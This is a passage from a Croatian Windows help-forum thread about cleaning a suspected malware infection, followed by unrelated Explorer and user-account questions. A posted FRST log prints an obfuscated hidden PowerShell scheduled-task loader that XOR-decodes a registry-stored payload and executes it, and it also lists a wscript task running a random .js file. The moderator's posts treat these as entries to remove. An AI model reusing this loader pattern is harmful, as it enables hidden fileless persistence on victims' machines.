|
23.07.2023., 21:45 | #1291 |
EMP moderator
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,426
|
Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log. https://www.bleepingcomputer.com/download/hijackthis/ Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj: Code:
try { if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false }; if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) { } else { return $false }; } catch { return $false } return $true # i na kraju powershell Set-ExecutionPolicy -ExecutionPolicy Restricted
__________________ "Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"
|
24.07.2023., 01:18 | #1292 | ||
Premium
Datum registracije: Oct 2008
Lokacija: osijek
Postovi: 1,869
|
Citiraj:
Citiraj:
__________________
Ako Vam je život tužan, ne brinite! Barem Vam je plaća smiješna |
||
25.07.2023., 20:02 | #1293 |
EMP moderator
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,426
|
Ima li kakvih promjena? Ovime možeš skroz disableati script host... Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue https://www.bleepingcomputer.com/for...ery-scan-tool/ Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.
__________________ "Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"
|
05.08.2023., 22:40 | #1296 | ||
Premium
Datum registracije: Oct 2008
Lokacija: osijek
Postovi: 1,869
|
Citiraj:
Citiraj:
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
__________________
Ako Vam je život tužan, ne brinite! Barem Vam je plaća smiješna |
||
05.08.2023., 23:26 | #1297 |
EMP moderator
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,426
|
Ja bih ovo maknuo: Code:
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File) Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN Code:
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic) Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
__________________ "Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"
|
10.01.2024., 09:38 | #1299 |
Premium
Datum registracije: Jul 2021
Lokacija: Sesvete
Postovi: 574
|
Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.
__________________
Mali Čile SAD Češka Peru |
10.01.2024., 10:08 | #1300 |
DIY DILETANT
Datum registracije: Jan 2009
Lokacija: Čistilište
Postovi: 3,117
|
|
10.01.2024., 10:09 | #1301 |
Premium
Datum registracije: Jul 2021
Lokacija: Sesvete
Postovi: 574
|
__________________
Mali Čile SAD Češka Peru |
10.01.2024., 10:13 | #1302 | |
Premium
Datum registracije: Mar 2015
Lokacija: mars
Postovi: 294
|
Citiraj:
Sent from my motorola edge 40 using Tapatalk |
|
10.01.2024., 10:40 | #1303 |
Premium
Datum registracije: Jul 2021
Lokacija: Sesvete
Postovi: 574
|
Meh... previše klikova plus kaj moram micati ruku s miša. Ovo sa win + e otvara. Ma samo sam htio da ako već imam shortcutove u tasbaru da ih mogu višestruko otvoriti mišem. Jbg, razmazio me Linux a i do W7 je bilo sve normalno dok nisu počeli bijesne gliste izvoditi sa sučeljem kao to je bolje. Edit: malo gunđam na Win. Bolje na Win nego na kolegice i kolege.
__________________
Mali Čile SAD Češka Peru Zadnje izmijenjeno od: spiderhr. 10.01.2024. u 10:49. |
11.02.2024., 14:19 | #1305 |
Buying Bitcoin
Datum registracije: Feb 2007
Lokacija: Croatia
Postovi: 7,997
|
Ekipa, iz čista mira mi se pojavio "user1" na Windowsima. Znači sinoć sve bilo normalno, ugasim komp, odem leć, danas ga upalim i dočeka me onaj login izbornik da odaberem s kojim userom ću se logirati u Win, moj defaultni ili taj user1. Ako kliknem na user1, pita me password. Wtf. Uđem u svoj i u settingsima pod users vidim ovo: Da li je moguće da je neki win update napravio tog usera? EDIT: Morao ući u safe mode, cmd run as admin, "net user user1 /del" da bi izbrisao taj account. Nakon toga normalni boot u win, pa opet run netplwiz, i maknit kvačicu sa "users must enter username and password to log in to this computer", jer me bez toga svejedno zaustavljao na login screenu nakon boota. Bravo Microsoft, bravo. Zadnje izmijenjeno od: Neo-ST. 11.02.2024. u 14:30. |
12.02.2024., 20:05 | #1307 |
EMP moderator
Datum registracije: Apr 2005
Lokacija: Osijek
Postovi: 18,426
|
__________________ "Kako su krojači novog svjetskog poretka uspjeli u tako kratko vrijeme slomiti intelektualne sposobnosti društva, uništiti kritičku svijest i ljudima nametnuti izvrnutu logiku?"
|
|
|